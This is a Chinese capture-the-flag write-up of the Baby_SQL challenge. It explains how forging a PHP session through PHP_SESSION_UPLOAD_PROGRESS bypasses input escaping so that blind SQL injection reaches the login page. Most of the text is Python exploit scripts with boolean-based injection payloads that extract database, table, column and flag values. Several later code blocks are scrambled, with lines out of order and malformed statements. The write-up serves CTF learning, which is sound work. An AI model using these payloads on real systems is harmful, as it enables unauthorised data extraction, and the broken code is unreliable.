根据题目名字,测试sql注入
抓包看到源代码,猜测文件包含,测试无果
登录和注册都没有注入点
题目提示也有
既然没思路,就扫目录
buu有请求次数限制,自己写个目录扫描
发现是source.zip泄露
代码审计
index页面有个函数会进行转义
他这里转义了所有传过去的参数
看到register和login都没有啥过滤,register必须要为admin注册
可以发现登录是存在注入点的
而index那个绕过是需要GBK编码才能绕的,之前还想着看看能不能二次注入,也不行
回过头来看到这段代码
register和login都有
SESSION数组在session_start()初始化后才产生,所以我们是不是可以伪造一个session来直接访问login和register,从而绕过index的转义,来进行sql注入
在phpsession里如果在php.ini中设置session.auto_start=On,那么PHP每次处理PHP文件的时候都会自动执行session_start(),但是session.auto_start默认为Off。与Session相关的另一个叫session.upload_progress.enabled,默认为On,在这个选项被打开的前提下我们在multipart POST的时候传入PHP_SESSION_UPLOAD_PROGRESS,PHP会执行session_start()
这个方法同样可以用来进行文件包含和反序列化
写脚本bp抓包
import requests
url = "http://6a742e0c-c6b0-49a3-b626-f5f0578d17f1.node3.buuoj.cn/templates/login.php"
files = {"file": "123456789"}
a = requests.post(url=url, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},
cookies={"PHPSESSID": "test1"}, params={'username': 'test', 'password': 'test'},
proxies={'http': "http://127.0.0.1:8080"})
print(a.text)
返回try again
可以发现我们已经成功伪造,就可以绕过index.php来注入了,login 没有任何过滤,可以直接注入,由于没有回显,采用盲注
先抓包构造注入语句,注意是双引号闭合
库名
ptbctf
表名
flag_tbl,ptbctf
字段名
flag_tbl:secret
ptbctf:username password
查flag_tbl的字段值即可
exp如下
import requests
import time
url = "http://6a742e0c-c6b0-49a3-b626-f5f0578d17f1.node3.buuoj.cn/templates/login.php"
files = {"file": "123456789"}
'''字段值'''
flag=''
for i in range(1,100):
low = 32
high = 128
mid = (low+high)//2
while (low < high):
time.sleep(0.06)
# payload_flag ={'username': "test" or (ascii(substr((select group_concat(username) from ptbctf ),{0},1))>{1}) #".format(i, mid),'password': 'test'}
payload_flag = {
'username': "test" or (ascii(substr((select group_concat(secret) from flag_tbl ),{0},1))>{1}) #".format(i,mid),'password': 'test'}
r = requests.post(url=url,params=payload_flag,files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},
cookies={"PHPSESSID": "test1"})
print(payload_flag)
if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:
low = mid +1
else:
high = mid
mid = (low + high) // 2
if(mid==32 or mid == 132):
break
flag +=chr(mid)
print(flag)
print(flag)
# column=''
for i in range(1,100):
low = 32
high = 128
mid = (low+high)//2
while (low < high):
time.sleep(0.06)
'username': "test" or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag_tbl' ),{0},1))>{1}) #".format(i, mid),'password': 'test'} payload_column ={
"PHP_SESSION_UPLOAD_PROGRESS": "123456789"}, r = requests.post(url=url,params=payload_column,files=files, data={
"PHPSESSID": "test1"}) cookies={
print(payload_column)
if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:
low = mid +1
else:
high = mid
mid = (low + high) // 2
if(mid==32 or mid == 132):
break
column +=chr(mid)
print(column)
print(column)
# '''表名'''
'' table=
for i in range(1,100):
low = 32
high = 128
mid = (low+high)//2
while (low < high):
time.sleep(0.06)
'username': 'test" or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ptbctf'),{0},1))>{1}) #'.format(i, mid),'password': 'test'} payload_table ={
"PHP_SESSION_UPLOAD_PROGRESS": "123456789"}, r = requests.post(url=url,params=payload_table,files=files, data={
"PHPSESSID": "test1"}) cookies={
print(payload_table)
if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:
low = mid +1
else:
high = mid
mid = (low + high) // 2
if(mid==32 or mid == 132):
break
table+=chr(mid)
print(table)
print(table)
# '''数据库名'''
'' database=
for i in range(1,100):
low = 32
high = 128
mid = (low+high)//2
while (low < high):
time.sleep(0.06)
'username': 'test" or (ascii(substr((select database()),{0},1))>{1}) #'.format(i, mid),'password': 'test'} payload_database ={
"PHP_SESSION_UPLOAD_PROGRESS": "123456789"}, r = requests.post(url=url,params=payload_database,files=files, data={
"PHPSESSID": "test1"}) cookies={
print(payload_database)
if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:
low = mid +1
else:
high = mid
mid = (low + high) // 2
if(mid==32 or mid == 132):
break
database+=chr(mid)
print(database)
print(database)
原文来自CSDN博主「penson by 小乌」|侵删
原文始发于微信公众号(寰宇卫士):[PwnThyBytes 2019]Baby_SQL-解题步骤详解
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论